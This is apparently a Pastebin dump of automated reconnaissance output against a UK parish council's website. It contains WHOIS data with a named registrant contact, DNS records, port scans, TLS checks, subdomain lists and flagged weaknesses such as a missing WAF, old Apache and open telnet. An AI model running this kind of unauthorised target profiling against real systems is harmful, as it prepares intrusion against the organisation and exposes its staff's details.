Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #######################################################################################################################################
- =======================================================================================================================================
- Hostname www.mundesley-pc.gov.uk ISP Gyron Internet Ltd
- Continent Europe Flag
- GB
- Country United Kingdom Country Code GB
- Region Unknown Local time 05 Sep 2019 06:24 BST
- City Unknown Postal Code Unknown
- IP Address 89.145.78.0 Latitude 51.496
- Longitude -0.122
- =======================================================================================================================================
- #######################################################################################################################################
- > www.mundesley-pc.gov.uk
- Server: 38.132.106.139
- Address: 38.132.106.139#53
- Non-authoritative answer:
- Name: www.mundesley-pc.gov.uk
- Address: 89.145.78.0
- >
- #######################################################################################################################################
- Domain:
- mundesley-pc.gov.uk
- Registered For:
- Mundesley Parish Council
- Domain Owner:
- Mundesley Parish Council
- Registered By:
- Fasthosts Internet Ltd
- Servers:
- ns1.livedns.co.uk
- ns2.livedns.co.uk
- Registrant Contact:
- Doreen Joy
- Registrant Address:
- Mundesley Parish Council
- The Old Fire Station
- Back Street
- Mundesley
- Norfolk
- NR11 8JJ
- United Kingdom
- +44 1263 720 603 (Phone)
- Renewal date:
- Monday 25th Oct 2021
- Entry updated:
- Thursday 1st August 2019
- Entry created:
- Thursday 26th October 2017
- #######################################################################################################################################
- [+] Target : www.mundesley-pc.gov.uk
- [+] IP Address : 89.145.78.0
- [+] Headers :
- [+] Connection : close
- [+] Cache-Control : no-cache, no-store, must-revalidate
- [+] Pragma : no-cache
- [+] Expires : 0
- [+] Server : Apache/2.2.16 (Debian)
- [+] Content-Length : 188982
- [+] SSL Certificate Information :
- [+] commonName : mundesley-pc.gov.uk
- [+] countryName : US
- [+] organizationName : Let's Encrypt
- [+] commonName : Let's Encrypt Authority X3
- [+] Version : 3
- [+] Serial Number : 037EA441FD8A12F1B15F7E9085E0FCF09480
- [+] Not Before : Jul 18 20:18:36 2019 GMT
- [+] Not After : Oct 16 20:18:36 2019 GMT
- [+] OCSP : ('http://ocsp.int-x3.letsencrypt.org',)
- [+] subject Alt Name : (('DNS', 'mundesley-pc.gov.uk'), ('DNS', 'www.mundesley-pc.gov.uk'))
- [+] CA Issuers : ('http://cert.int-x3.letsencrypt.org/',)
- [+] Whois Lookup :
- [+] NIR : None
- [+] ASN Registry : ripencc
- [+] ASN : 29017
- [+] ASN CIDR : 89.145.64.0/18
- [+] ASN Country Code : GB
- [+] ASN Date : 2006-01-31
- [+] ASN Description : GYRON ====, GB
- [+] cidr : 89.145.76.0/22
- [+] name : G-CUS-MW01
- [+] handle : GAT1-RIPE
- [+] range : 89.145.76.0 - 89.145.79.255
- [+] description : United Hosting IPv4 Assignment
- This space is statically assigned
- [+] country : GB
- [+] state : None
- [+] city : None
- [+] address : Gyron Internet Ltd
- 3 Centro
- Boundary Way
- Hemel Hempstead
- HP2 7SU
- United Kingdom
- [+] postal_code : None
- [+] emails : ['[email protected]']
- [+] created : 2006-10-18T11:50:01Z
- [+] updated : 2011-02-03T10:53:53Z
- [+] Crawling Target...
- [-] Error : 403
- [+] Completed!
- #######################################################################################################################################
- [+] Starting At 2019-09-05 02:21:33.229471
- [+] Collecting Information On: https://www.mundesley-pc.gov.uk/
- [#] Status: 403
- --------------------------------------------------
- [#] Web Server Detected: Apache/2.2.16 (Debian)
- [!] X-Frame-Options Headers not detect! target might be vulnerable Click Jacking
- - Cache-Control: no-cache, no-store, must-revalidate
- - Pragma: no-cache
- - Expires: 0
- - Server: Apache/2.2.16 (Debian)
- - Content-Length: 188983
- --------------------------------------------------
- [#] Finding Location..!
- [#] as: AS29017 Gyron Internet Ltd
- [#] city: Hemel Hempstead
- [#] country: United Kingdom
- [#] countryCode: GB
- [#] isp: GYRON Gyron Internet Ltd AS29017
- [#] lat: 51.7643
- [#] lon: -0.432563
- [#] org: Gyron Internet Ltd
- [#] query: 89.145.78.0
- [#] region: ENG
- [#] regionName: England
- [#] status: success
- [#] timezone: Europe/London
- [#] zip: HP2 7SU
- --------------------------------------------------
- [x] Didn't Detect WAF Presence on: https://www.mundesley-pc.gov.uk/
- --------------------------------------------------
- [#] Starting Reverse DNS
- [-] Failed ! Fail
- --------------------------------------------------
- [!] Scanning Open Port
- [#] 19/tcp open chargen
- [#] 20/tcp open ftp-data
- [#] 21/tcp open ftp
- [#] 23/tcp open telnet
- [#] 53/tcp open domain
- [#] 79/tcp open finger
- [#] 80/tcp open http
- [#] 119/tcp open nntp
- [#] 407/tcp open timbuktu
- [#] 416/tcp open silverplatter
- [#] 443/tcp open https
- [#] 464/tcp open kpasswd5
- [#] 545/tcp open ekshell
- [#] 555/tcp open dsf
- [#] 617/tcp open sco-dtmgr
- [#] 636/tcp open ldapssl
- [#] 666/tcp open doom
- [#] 700/tcp open epp
- [#] 900/tcp open omginitialrefs
- [#] 1001/tcp open webpush
- [#] 1002/tcp open windows-icfw
- [#] 1022/tcp open exp2
- [#] 1025/tcp open NFS-or-IIS
- [#] 1026/tcp open LSA-or-nterm
- [#] 1028/tcp open unknown
- [#] 1041/tcp open danf-ak2
- [#] 1117/tcp open ardus-mtrns
- [#] 1165/tcp open qsm-gui
- [#] 1169/tcp open tripwire
- [#] 1218/tcp open aeroflight-ads
- [#] 1233/tcp open univ-appserver
- [#] 1247/tcp open visionpyramid
- [#] 1272/tcp open cspmlockmgr
- [#] 1719/tcp open h323gatestat
- [#] 1720/tcp open h323q931
- [#] 1723/tcp open pptp
- [#] 1840/tcp open netopia-vo2
- [#] 1862/tcp open mysql-cm-agent
- [#] 1864/tcp open paradym-31
- [#] 1914/tcp open elm-momentum
- [#] 1972/tcp open intersys-cache
- [#] 2000/tcp open cisco-sccp
- [#] 2005/tcp open deslogin
- [#] 2020/tcp open xinupageserver
- [#] 2033/tcp open glogger
- [#] 2034/tcp open scoremgr
- [#] 2046/tcp open sdfunc
- [#] 2068/tcp open avocentkvm
- [#] 2105/tcp open eklogin
- [#] 2106/tcp open ekshell
- [#] 2222/tcp open EtherNetIP-1
- [#] 2910/tcp open tdaccess
- [#] 3017/tcp open event_listener
- [#] 3261/tcp open winshadow
- [#] 3737/tcp open xpanel
- [#] 5000/tcp open upnp
- [#] 5432/tcp open postgresql
- [#] 5550/tcp open sdadmind
- [#] 5718/tcp open dpm
- [#] 5801/tcp open vnc-http-1
- [#] 5900/tcp open vnc
- [#] 5998/tcp open ncd-diag
- [#] 6004/tcp open X11:4
- [#] 6005/tcp open X11:5
- [#] 6025/tcp open x11
- [#] 6059/tcp open X11:59
- [#] 6106/tcp open isdninfo
- [#] 6667/tcp open irc
- [#] 6669/tcp open irc
- [#] 6969/tcp open acmsoda
- [#] 7000/tcp open afs3-fileserver
- [#] 8022/tcp open oa-system
- [#] 8080/tcp open http-proxy
- [#] 8089/tcp open unknown
- [#] 8383/tcp open m2mservices
- [#] 8899/tcp open ospf-lite
- [#] 9002/tcp open dynamid
- [#] 9009/tcp open pichat
- [#] 9010/tcp open sdr
- [#] 9091/tcp open xmltec-xmlmail
- [#] 9102/tcp open jetdirect
- [#] 9535/tcp open man
- [#] 9594/tcp open msgsys
- [#] 10003/tcp open documentum_s
- [#] 12345/tcp open netbus
- [#] 31337/tcp open Elite
- [#] 32778/tcp open sometimes-rpc19
- [#] 32780/tcp open sometimes-rpc23
- [#] 49400/tcp open compaqdiag
- --------------------------------------------------
- [+] Collecting Information Disclosure!
- [#] Detecting sitemap.xml file
- [!] sitemap.xml File Found: https://www.mundesley-pc.gov.uk//sitemap.xml
- [#] Detecting robots.txt file
- [!] robots.txt File Found: https://www.mundesley-pc.gov.uk//robots.txt
- [#] Detecting GNU Mailman
- [-] GNU Mailman App Not Detected!?
- --------------------------------------------------
- [+] Crawling Url Parameter On: https://www.mundesley-pc.gov.uk/
- --------------------------------------------------
- [#] Searching Html Form !
- [+] Html Form Discovered
- [#] action: /verify.php
- [#] class: None
- [#] id: None
- [#] method: post
- --------------------------------------------------
- [!] Found 1 dom parameter
- [#] https://www.mundesley-pc.gov.uk//#
- --------------------------------------------------
- [!] 15 Internal Dynamic Parameter Discovered
- [+] https://www.mundesley-pc.gov.uk//demo/GHH%20-%20Haxplorer/1.php?param=honey
- [+] https://www.mundesley-pc.gov.uk//demo/GHH%20-%20PHP%20Ping/php-ping.php?param=honey
- [+] https://www.mundesley-pc.gov.uk//demo/GHH%20-%20PHP%20Shell/phpshell.php?param=honey
- [+] https://www.mundesley-pc.gov.uk//demo/GHH%20-%20PHPBB%20Install/phpBB2/install/install.php?param=honey
- [+] https://www.mundesley-pc.gov.uk//demo/GHH%20-%20PHPFM/index.php?param=honey
- [+] https://www.mundesley-pc.gov.uk//demo/GHH%20-%20PhpSysInfo/index.php?param=honey
- [+] https://www.mundesley-pc.gov.uk//demo/GHH%20-%20SquirrelMail/src/login.php?param=honey
- [+] https://www.mundesley-pc.gov.uk///demo/?GHH v1.1 - WebUtil 2.7
- [+] https://www.mundesley-pc.gov.uk///demo/?GHH v1.1 - .mdb/admin.mdb
- [+] https://www.mundesley-pc.gov.uk///demo/?GHH v1.1 - .sql/create.sql
- [+] https://www.mundesley-pc.gov.uk///demo/?GHH v1.1 - AIM BuddyList/BuddyList.blt
- [+] https://www.mundesley-pc.gov.uk///demo/?GHH v1.1 - File Upload Manager/
- [+] https://www.mundesley-pc.gov.uk///demo/?GHH v1.1 - passlist.txt/passlist.txt
- [+] https://www.mundesley-pc.gov.uk///demo/?GHH v1.1 - passwd.txt/passwd.txt
- [+] https://www.mundesley-pc.gov.uk///demo/?GHH v1.1 - WebUtil 2.7/webutil.pl
- --------------------------------------------------
- [-] No external Dynamic Paramter Found!?
- --------------------------------------------------
- [!] 3 Internal links Discovered
- [+] https://www.mundesley-pc.gov.uk///css/flag.css
- [+] https://www.mundesley-pc.gov.uk//mailto:[email protected]
- [+] https://www.mundesley-pc.gov.uk//mailto:[email protected]
- --------------------------------------------------
- [-] No External Link Found!?
- --------------------------------------------------
- [#] Mapping Subdomain..
- [!] Found 3 Subdomain
- - mail.mundesley-pc.gov.uk
- - mundesley-pc.gov.uk
- - www.mundesley-pc.gov.uk
- --------------------------------------------------
- [!] Done At 2019-09-05 02:26:28.524817
- ######################################################################################################################################
- [i] Scanning Site: https://www.mundesley-pc.gov.uk
- B A S I C I N F O
- ====================
- [+] Site Title:
- [+] IP address: 89.145.78.0
- [+] Web Server: Apache/2.2.16 (Debian)
- [+] CMS: Could Not Detect
- [+] Cloudflare: Not Detected
- [+] Robots File: Found
- -------------[ contents ]----------------
- User-agent: *
- Disallow: /
- User-agent: MJ12bot
- Disallow: /
- User-agent: rogerbot
- Disallow: /
- User-agent: dotbot
- Disallow: /
- -----------[end of contents]-------------
- W H O I S L O O K U P
- ========================
- Domain:
- mundesley-pc.gov.uk
- Registered For:
- Mundesley Parish Council
- Domain Owner:
- Mundesley Parish Council
- Registered By:
- Fasthosts Internet Ltd
- Servers:
- ns1.livedns.co.uk
- ns2.livedns.co.uk
- Registrant Contact:
- Doreen Joy
- Registrant Address:
- Mundesley Parish Council
- The Old Fire Station
- Back Street
- Mundesley
- Norfolk
- NR11 8JJ
- United Kingdom
- +44 1263 720 603 (Phone)
- Renewal date:
- Monday 25th Oct 2021
- Entry updated:
- Thursday 1st August 2019
- Entry created:
- Thursday 26th October 2017
- G E O I P L O O K U P
- =========================
- [i] IP Address: 89.145.78.0
- [i] Country: United Kingdom
- [i] State:
- [i] City:
- [i] Latitude: 51.4964
- [i] Longitude: -0.1224
- H T T P H E A D E R S
- =======================
- [i] HTTP/1.1 403 Forbidden
- [i] Connection: close
- [i] Cache-Control: no-cache, no-store, must-revalidate
- [i] Pragma: no-cache
- [i] Expires: 0
- [i] Server: Apache/2.2.16 (Debian)
- [i] Content-Length: 188983
- D N S L O O K U P
- ===================
- mundesley-pc.gov.uk. 3599 IN A 89.145.78.0
- mundesley-pc.gov.uk. 3599 IN NS ns1.livedns.co.uk.
- mundesley-pc.gov.uk. 3599 IN NS ns2.livedns.co.uk.
- mundesley-pc.gov.uk. 3599 IN NS ns3.livedns.co.uk.
- mundesley-pc.gov.uk. 3599 IN SOA ns1.livedns.co.uk. admin.mundesley-pc.gov.uk. 1524990353 10800 3600 604800 3600
- mundesley-pc.gov.uk. 3599 IN MX 0 mundesleypc-gov-uk02c.mail.protection.outlook.com.
- mundesley-pc.gov.uk. 3599 IN TXT "MS=ms57028444"
- mundesley-pc.gov.uk. 3599 IN TXT "v=spf1 include:spf.protection.outlook.com -all"
- S U B N E T C A L C U L A T I O N
- ====================================
- Address = 89.145.78.0
- Network = 89.145.78.0 / 32
- Netmask = 255.255.255.255
- Broadcast = not needed on Point-to-Point links
- Wildcard Mask = 0.0.0.0
- Hosts Bits = 0
- Max. Hosts = 1 (2^0 - 0)
- Host Range = { 89.145.78.0 - 89.145.78.0 }
- N M A P P O R T S C A N
- ============================
- Starting Nmap 7.70 ( https://nmap.org ) at 2019-09-05 06:21 UTC
- Nmap scan report for mundesley-pc.gov.uk (89.145.78.0)
- Host is up (0.070s latency).
- rDNS record for 89.145.78.0: pegasus.terrassl.net
- PORT STATE SERVICE
- 21/tcp open ftp
- 22/tcp filtered ssh
- 23/tcp open telnet
- 80/tcp open http
- 110/tcp filtered pop3
- 143/tcp filtered imap
- 443/tcp open https
- 3389/tcp filtered ms-wbt-server
- Nmap done: 1 IP address (1 host up) scanned in 2.39 seconds
- S U B - D O M A I N F I N D E R
- ==================================
- [i] Total Subdomains Found : 2
- [+] Subdomain: mail.mundesley-pc.gov.uk
- [-] IP: 213.171.216.40
- [+] Subdomain: www.mundesley-pc.gov.uk
- [-] IP: 89.145.78.0
- #######################################################################################################################################
- Trying "mundesley-pc.gov.uk"
- ;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49398
- ;; flags: qr rd ra; QUERY: 1, ANSWER: 8, AUTHORITY: 3, ADDITIONAL: 3
- ;; QUESTION SECTION:
- ;mundesley-pc.gov.uk. IN ANY
- ;; ANSWER SECTION:
- mundesley-pc.gov.uk. 3600 IN TXT "MS=ms57028444"
- mundesley-pc.gov.uk. 3600 IN TXT "v=spf1 include:spf.protection.outlook.com -all"
- mundesley-pc.gov.uk. 3600 IN MX 0 mundesleypc-gov-uk02c.mail.protection.outlook.com.
- mundesley-pc.gov.uk. 3600 IN SOA ns1.livedns.co.uk. admin.mundesley-pc.gov.uk. 1524990353 10800 3600 604800 3600
- mundesley-pc.gov.uk. 3600 IN A 89.145.78.0
- mundesley-pc.gov.uk. 3600 IN NS ns2.livedns.co.uk.
- mundesley-pc.gov.uk. 3600 IN NS ns1.livedns.co.uk.
- mundesley-pc.gov.uk. 3600 IN NS ns3.livedns.co.uk.
- ;; AUTHORITY SECTION:
- mundesley-pc.gov.uk. 3600 IN NS ns2.livedns.co.uk.
- mundesley-pc.gov.uk. 3600 IN NS ns1.livedns.co.uk.
- mundesley-pc.gov.uk. 3600 IN NS ns3.livedns.co.uk.
- ;; ADDITIONAL SECTION:
- ns1.livedns.co.uk. 34785 IN A 217.160.81.244
- ns2.livedns.co.uk. 10090 IN A 217.160.82.244
- ns3.livedns.co.uk. 11923 IN A 217.160.83.244
- Received 400 bytes from 2001:18c0:121:6900:724f:b8ff:fefd:5b6a#53 in 1182 ms
- #######################################################################################################################################
- ; <<>> DiG 9.11.5-P4-5.1+b1-Debian <<>> +trace mundesley-pc.gov.uk
- ;; global options: +cmd
- . 85001 IN NS i.root-servers.net.
- . 85001 IN NS h.root-servers.net.
- . 85001 IN NS l.root-servers.net.
- . 85001 IN NS e.root-servers.net.
- . 85001 IN NS k.root-servers.net.
- . 85001 IN NS j.root-servers.net.
- . 85001 IN NS g.root-servers.net.
- . 85001 IN NS f.root-servers.net.
- . 85001 IN NS c.root-servers.net.
- . 85001 IN NS b.root-servers.net.
- . 85001 IN NS m.root-servers.net.
- . 85001 IN NS d.root-servers.net.
- . 85001 IN NS a.root-servers.net.
- . 85001 IN RRSIG NS 8 0 518400 20190917170000 20190904160000 59944 . kJzCa4mgmQtUH+7dsVMu4/C6/jIQxEQDEXuU796OWvahRokNyKlHUZEG lmo2VzR1knfamOY3e5m1lQm4ML/bT6wnvw6oFxBOHYw6ICOG6zuxn6S4 j3i8auNLT9LmPKGdGBawaN1lZQDogx2BcSGSfIv5oCFzlsfsSePa2jse L7x2Ah2D4eXZsOeXOknM13u20zcFpriyqRw2+WFQ9+UZGubU2H/Wfgvt J7nmNzVDJPr/Pnxdor73aHkqrTdjHwxaf+/nCYG6t1diLtymapgfzERf VwzyGxUrrgFJcjCf1mZeWZZmxkSUWBCvy3IuFmwETUlc7pIs9wWdA1vQ wc3u/g==
- ;; Received 525 bytes from 185.93.180.131#53(185.93.180.131) in 170 ms
- uk. 172800 IN NS nsa.nic.uk.
- uk. 172800 IN NS dns1.nic.uk.
- uk. 172800 IN NS dns2.nic.uk.
- uk. 172800 IN NS dns3.nic.uk.
- uk. 172800 IN NS dns4.nic.uk.
- uk. 172800 IN NS nsc.nic.uk.
- uk. 172800 IN NS nsd.nic.uk.
- uk. 172800 IN NS nsb.nic.uk.
- uk. 86400 IN DS 43876 8 2 A107ED2AC1BD14D924173BC7E827A1153582072394F9272BA37E2353 BC659603
- uk. 86400 IN RRSIG DS 8 1 86400 20190918050000 20190905040000 59944 . pTy1O0qnDa8QFnjHG8uLA3kE0LSl2chxPki1H6PCgfvqlq6urZWHhyhc 2+VXYtadahxfxtJHtbbmNaYfMV5NHsPACxeuYBBah2/JCqAxmNre1HYJ RbsD/W7IQ0iVtdUsOAV9Px8HYf2W48OIri4QfiXuGyfPpPu1C3fsHlwI Ucun+8yt5L5Ph0VEsm9ZICfb/630i2L8GhYiOP+JplMVkHgI9HnHwu0B wDJux9KI5PIbGcdV2dpyDVLOKARfY6jH5SXNyV5K3qvd8LXBbFR/2WM9 FVXhgA2fNopv6pt1vY+Is1Y1UIGR5og/4SGDkMQSHIeFIuy/cO+jiCbq qUDcZw==
- ;; Received 803 bytes from 2001:dc3::35#53(m.root-servers.net) in 89 ms
- gov.uk. 172800 IN NS ns0.ja.net.
- gov.uk. 172800 IN NS ns1.surfnet.nl.
- gov.uk. 172800 IN NS ns2.ja.net.
- gov.uk. 172800 IN NS ns3.ja.net.
- gov.uk. 172800 IN NS ns4.ja.net.
- gov.uk. 172800 IN NS auth00.ns.de.uu.net.
- gov.uk. 172800 IN NS auth50.ns.de.uu.net.
- gov.uk. 300 IN DS 17539 8 2 2F0A0A65DB9E930F5B2C0425F67DF66416C076124652A281D9A8FFA7 73828F57
- gov.uk. 300 IN RRSIG DS 8 2 300 20190918101947 20190904095516 43056 uk. THIHDoQWrvY90/IJqLD5/7cTTZ5KEmGhoKCmvmMkEvjYPCtm8ygot9Un VffuzT3bFkykND6ldeIA0baGeew7qWD1Ue0aAO1f2admT/5CM9RV9wvI RuYp8CvnvqG0qO9EQaADFAtdesDrha13dhqgg40kDPBCgHrYrBOyuIqC uF0=
- ;; Received 415 bytes from 2a01:618:404::1#53(dns3.nic.uk) in 105 ms
- mundesley-pc.gov.uk. 86400 IN NS ns1.livedns.co.uk.
- mundesley-pc.gov.uk. 86400 IN NS ns2.livedns.co.uk.
- KKLL3AB3UP9O8E7NBCPIOE643RP1FEUG.gov.uk. 14400 IN NSEC3 1 0 10 - KKORTM598IFOR37DSAO5MUFI90788C6V NS
- KKLL3AB3UP9O8E7NBCPIOE643RP1FEUG.gov.uk. 14400 IN RRSIG NSEC3 8 3 14400 20191004130752 20190904130752 924 gov.uk. dqVa1/KQgioYswT4LrDvUQpVDJWaD2GIBrahiqmKu5+cyAoWd9LLQ0ur X7xW3jvMI/CPJui6Xmj/IHezb3j1seel2e+PqW41vWzeuYIEcUaLlwnO lsPWz9Iu4hORNAk+m277w4O64py+RMABRGHEv0JHDFlwVOGfuv4nLoDe ndQ=
- ;; Received 335 bytes from 2001:600:1c0:e000::35:6#53(auth00.ns.de.uu.net) in 119 ms
- mundesley-pc.gov.uk. 3600 IN A 89.145.78.0
- ;; Received 64 bytes from 217.160.82.244#53(ns2.livedns.co.uk) in 107 ms
- #######################################################################################################################################
- [*] Performing General Enumeration of Domain: mundesley-pc.gov.uk
- [-] DNSSEC is not configured for mundesley-pc.gov.uk
- [*] SOA ns1.livedns.co.uk 217.160.81.244
- [*] NS ns2.livedns.co.uk 217.160.82.244
- [*] Bind Version for 217.160.82.244 Served by PowerDNS - https://www.powerdns.com/
- [*] NS ns1.livedns.co.uk 217.160.81.244
- [*] Bind Version for 217.160.81.244 Served by PowerDNS - https://www.powerdns.com/
- [*] MX mundesleypc-gov-uk02c.mail.protection.outlook.com 104.47.20.36
- [*] MX mundesleypc-gov-uk02c.mail.protection.outlook.com 104.47.21.36
- [*] A mundesley-pc.gov.uk 89.145.78.0
- [*] TXT mundesley-pc.gov.uk MS=ms57028444
- [*] TXT mundesley-pc.gov.uk v=spf1 include:spf.protection.outlook.com -all
- [*] Enumerating SRV Records
- [-] No SRV Records Found for mundesley-pc.gov.uk
- [+] 0 Records Found
- #######################################################################################################################################
- [*] Processing domain mundesley-pc.gov.uk
- [*] Using system resolvers ['185.93.180.131', '194.187.251.67', '38.132.106.139', '192.168.0.1', '2001:18c0:121:6900:724f:b8ff:fefd:5b6a']
- [+] Getting nameservers
- 217.160.82.244 - ns2.livedns.co.uk
- 217.160.81.244 - ns1.livedns.co.uk
- [-] Zone transfer failed
- [+] TXT records found
- "MS=ms57028444"
- "v=spf1 include:spf.protection.outlook.com -all"
- [+] MX records found, added to target list
- 0 mundesleypc-gov-uk02c.mail.protection.outlook.com.
- [*] Scanning mundesley-pc.gov.uk for A records
- 89.145.78.0 - mundesley-pc.gov.uk
- 40.101.137.24 - autodiscover.mundesley-pc.gov.uk
- 40.101.138.216 - autodiscover.mundesley-pc.gov.uk
- 40.101.138.8 - autodiscover.mundesley-pc.gov.uk
- 213.171.216.40 - mail.mundesley-pc.gov.uk
- 213.171.216.40 - mailserver.mundesley-pc.gov.uk
- 213.171.216.50 - smtp.mundesley-pc.gov.uk
- 213.171.216.231 - webmail.mundesley-pc.gov.uk
- 89.145.78.0 - www.mundesley-pc.gov.uk
- #######################################################################################################################################
- AVAILABLE PLUGINS
- -----------------
- RobotPlugin
- OpenSslCipherSuitesPlugin
- HeartbleedPlugin
- FallbackScsvPlugin
- SessionRenegotiationPlugin
- OpenSslCcsInjectionPlugin
- SessionResumptionPlugin
- HttpHeadersPlugin
- EarlyDataPlugin
- CertificateInfoPlugin
- CompressionPlugin
- CHECKING HOST(S) AVAILABILITY
- -----------------------------
- 89.145.78.0:443 => 89.145.78.0
- SCAN RESULTS FOR 89.145.78.0:443 - 89.145.78.0
- ----------------------------------------------
- * Deflate Compression:
- OK - Compression disabled
- * Certificate Information:
- Content
- SHA1 Fingerprint: 1e26051a4de5c5c3f77be8a14de7b73ca71e8490
- Common Name: bench-memorial-plaques.co.uk
- Issuer: Let's Encrypt Authority X3
- Serial Number: 274404741044414810180390160691012314592224
- Not Before: 2019-07-22 20:11:07
- Not After: 2019-10-20 20:11:07
- Signature Algorithm: sha256
- Public Key Algorithm: RSA
- Key Size: 2048
- Exponent: 65537 (0x10001)
- DNS Subject Alternative Names: ['bench-memorial-plaques.co.uk', 'cpanel.bench-memorial-plaques.co.uk', 'mail.bench-memorial-plaques.co.uk', 'webdisk.bench-memorial-plaques.co.uk', 'webmail.bench-memorial-plaques.co.uk', 'www.bench-memorial-plaques.co.uk']
- Trust
- Hostname Validation: FAILED - Certificate does NOT match 89.145.78.0
- Android CA Store (9.0.0_r9): OK - Certificate is trusted
- Apple CA Store (iOS 12, macOS 10.14, watchOS 5, and tvOS 12):OK - Certificate is trusted
- Java CA Store (jdk-12.0.1): OK - Certificate is trusted
- Mozilla CA Store (2019-03-14): OK - Certificate is trusted
- Windows CA Store (2019-05-27): OK - Certificate is trusted
- Symantec 2018 Deprecation: WARNING: Certificate distrusted by Google and Mozilla on September 2018
- Received Chain: bench-memorial-plaques.co.uk --> Let's Encrypt Authority X3
- Verified Chain: bench-memorial-plaques.co.uk --> Let's Encrypt Authority X3 --> DST Root CA X3
- Received Chain Contains Anchor: OK - Anchor certificate not sent
- Received Chain Order: OK - Order is valid
- Verified Chain contains SHA1: OK - No SHA1-signed certificate in the verified certificate chain
- Extensions
- OCSP Must-Staple: NOT SUPPORTED - Extension not found
- Certificate Transparency: WARNING - Only 2 SCTs included but Google recommends 3 or more
- OCSP Stapling
- NOT SUPPORTED - Server did not send back an OCSP response
- * OpenSSL Heartbleed:
- OK - Not vulnerable to Heartbleed
- * TLSV1 Cipher Suites:
- Server rejected all cipher suites.
- * Downgrade Attacks:
- TLS_FALLBACK_SCSV: OK - Supported
- * TLSV1_1 Cipher Suites:
- Forward Secrecy OK - Supported
- RC4 OK - Not Supported
- Preferred:
- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 403 Forbidden
- Accepted:
- TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 403 Forbidden
- TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 403 Forbidden
- TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 403 Forbidden
- TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 403 Forbidden
- TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 403 Forbidden
- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 403 Forbidden
- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 403 Forbidden
- TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 403 Forbidden
- TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 403 Forbidden
- TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 403 Forbidden
- TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 403 Forbidden
- TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 403 Forbidden
- * TLS 1.2 Session Resumption Support:
- With Session IDs: OK - Supported (5 successful, 0 failed, 0 errors, 5 total attempts).
- With TLS Tickets: OK - Supported
- * Session Renegotiation:
- Client-initiated Renegotiation: OK - Rejected
- Secure Renegotiation: OK - Supported
- * TLSV1_2 Cipher Suites:
- Forward Secrecy OK - Supported
- RC4 OK - Not Supported
- Preferred:
- TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 403 Forbidden
- Accepted:
- TLS_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 403 Forbidden
- TLS_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 403 Forbidden
- TLS_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 403 Forbidden
- TLS_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 403 Forbidden
- TLS_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 403 Forbidden
- TLS_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 403 Forbidden
- TLS_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 403 Forbidden
- TLS_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 403 Forbidden
- TLS_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 403 Forbidden
- TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 403 Forbidden
- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 256 bits HTTP 403 Forbidden
- TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 403 Forbidden
- TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 403 Forbidden
- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 403 Forbidden
- TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 403 Forbidden
- TLS_ECDHE_RSA_WITH_3DES_EDE_CBC_SHA 112 bits HTTP 403 Forbidden
- TLS_DHE_RSA_WITH_CAMELLIA_256_CBC_SHA 256 bits HTTP 403 Forbidden
- TLS_DHE_RSA_WITH_CAMELLIA_128_CBC_SHA 128 bits HTTP 403 Forbidden
- TLS_DHE_RSA_WITH_AES_256_GCM_SHA384 256 bits HTTP 403 Forbidden
- TLS_DHE_RSA_WITH_AES_256_CBC_SHA256 256 bits HTTP 403 Forbidden
- TLS_DHE_RSA_WITH_AES_256_CBC_SHA 256 bits HTTP 403 Forbidden
- TLS_DHE_RSA_WITH_AES_128_GCM_SHA256 128 bits HTTP 403 Forbidden
- TLS_DHE_RSA_WITH_AES_128_CBC_SHA256 128 bits HTTP 403 Forbidden
- TLS_DHE_RSA_WITH_AES_128_CBC_SHA 128 bits HTTP 403 Forbidden
- * OpenSSL CCS Injection:
- OK - Not vulnerable to OpenSSL CCS injection
- * SSLV2 Cipher Suites:
- Server rejected all cipher suites.
- * TLSV1_3 Cipher Suites:
- Server rejected all cipher suites.
- * SSLV3 Cipher Suites:
- Server rejected all cipher suites.
- * ROBOT Attack:
- OK - Not vulnerable
- SCAN COMPLETED IN 32.80 S
- -------------------------
- #######################################################################################################################################
- Domains still to check: 1
- Checking if the hostname mundesley-pc.gov.uk. given is in fact a domain...
- Analyzing domain: mundesley-pc.gov.uk.
- Checking NameServers using system default resolver...
- IP: 217.160.82.244 (Germany)
- HostName: ns2.livedns.co.uk Type: NS
- HostName: ns2.livedns.co.uk Type: PTR
- IP: 217.160.81.244 (Germany)
- HostName: ns1.livedns.co.uk Type: NS
- HostName: ns1.livedns.co.uk Type: PTR
- Checking MailServers using system default resolver...
- IP: 104.47.21.36 (United States)
- HostName: mundesleypc-gov-uk02c.mail.protection.outlook.com Type: MX
- HostName: mail-lo2gbr010036.inbound.protection.outlook.com Type: PTR
